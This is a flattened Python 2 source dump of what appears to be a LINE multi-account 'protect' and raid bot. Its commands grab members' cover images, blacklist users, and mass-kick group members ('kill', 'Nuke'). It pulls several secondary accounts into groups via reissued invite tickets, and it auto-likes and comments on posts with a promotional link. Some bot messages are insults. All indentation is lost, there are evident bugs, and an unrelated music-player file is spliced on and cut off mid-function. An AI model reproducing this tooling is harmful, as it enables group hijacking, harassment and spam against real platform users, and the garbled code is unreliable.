text = profile.displayName
ki5.sendText(msg.to, text)
profile = ki5.getProfile()
#------------------------------------------------------------------
elif "Steal home @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Steal home @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
elif ("Ban " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif msg.text.lower() == 'Banlist':
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'banlist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += "�" +cl.getContact(mm).displayName + "\n"
cl.sendText(msg.to,cocoa + "Daftar Hitam")
elif msg.text in ["cb","���้างดำ"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in [" Ban","ดำ"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unban","ขาว"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist","เชคดำ"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text.lower() == 'kill':
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "Nuke" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Nuke","")
gs = cl.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
cl.sendText(msg.to,"Masih Mauko Sundala")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Tidak ada Member")
ki.sendText(msg.to,"Nothing Bosqu")
else:
for target in targets:
if not target in Bots:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg,to,"Hahaha")
ki.sendText(msg,to,"Fakyu Sundala")
#-----------------------------------------------
#-----------------------------------------------
elif "Kicker" in msg.text:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
ki2.acceptGroupInvitationByTicket(msg.to,Ti)
ki3.acceptGroupInvitationByTicket(msg.to,Ti)
ki4.acceptGroupInvitationByTicket(msg.to,Ti)
ki5.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#-----------------------------------------------
elif msg.text in ["Sayang","Kuy","All join","Minna"]:
if msg.from_ in admsa:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
elif msg.text.lower() == 'spcome':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "As1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki.updateGroup(G)
#-----------------------------------------------
elif "As2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "As3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
#-----------------------------------------------
elif "As4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
#-----------------------------------------------
elif "As5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["คิกออก","Bye","กุเกลียดมึง","Sayonara"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"ไปก็ได้ บ๊ายบาย " + str(ginfo.name) + "")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Welcome","wc on","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
wait["wc"] = True
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif msg.text in ["Welcome","wc off","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
wait["wc"] = False
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#-----------------------------------------------
#-----------------------------------------------
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
elif op.param3 in kimid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
except:
pass
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
# pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
# random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in admin + Bots:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
else:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open QR Kick finish-----#
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n|| " + Nama
wait2['ROM'][op.param1][op.param2] = "|| " + Nama
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def autolike():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait['likeOn'] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Already Liked Om"
time.sleep(0.60)
def likeme():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Om"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
music.py
|
import os, time
import pygame
from pygame.locals import *
import ffmpeg
import threading
import datetime
import math
import wave
import mutagen
class MusicCache:
def __init__(self, endevent=None):
self.cache = {}
self.endevent = endevent
def get(self, filename):
if isinstance(filename, list):
_filename = "-".join("%s"%filename)
else:
_filename = filename
if self.cache.get(_filename):
return self.cache.get(_filename)
else:
music = Music(self.endevent)
music.load(filename)
self.cache[_filename] = music
return self.cache.get(_filename)
class Music:
FREQ = 44100
SIZE = 16
CHANNELS = 2
@classmethod
def offset(self, seq = 1):
return seq * self.FREQ * self.SIZE * self.CHANNELS / 8
@classmethod
def seconds(self, ofs):
return float(ofs) / self.offset()
@classmethod
def init(self):
pygame.mixer.pre_init(self.FREQ, self.SIZE, self.CHANNELS, 1024*4)
def __init__(self, endevent=None):
self.buffer = None
self.channel = None
self.sound = None
self.endevent = endevent
self.filename = None
self.thread = None
self.cache = None
self.play_start_time = None
self.paused_at = None
def load(self, filename):
self.filename = filename
# pygame.mixer.music.load(filename)
def play(self, offset_second = 0):
if self.channel:
print("Clear channel")
self.stop()
self.channel = pygame.mixer.find_channel()
if not self.channel or self.channel.get_busy():
print("Error: Channel is busy!")
return False
def play_async(filename, offset_second):
print("Play async")
total_buf = None
self.play_start_time = None
played_offset = 0
ioptions = {}
if offset_second:
ioptions["ss"] = offset_second
pipe = ffmpeg.input(filename, **ioptions).output("pipe:", ac=Music.CHANNELS, f="s16le", acodec="pcm_s16le").run_async(pipe_stdout=True, pipe_stderr=True)
pipe.stderr.close()
try:
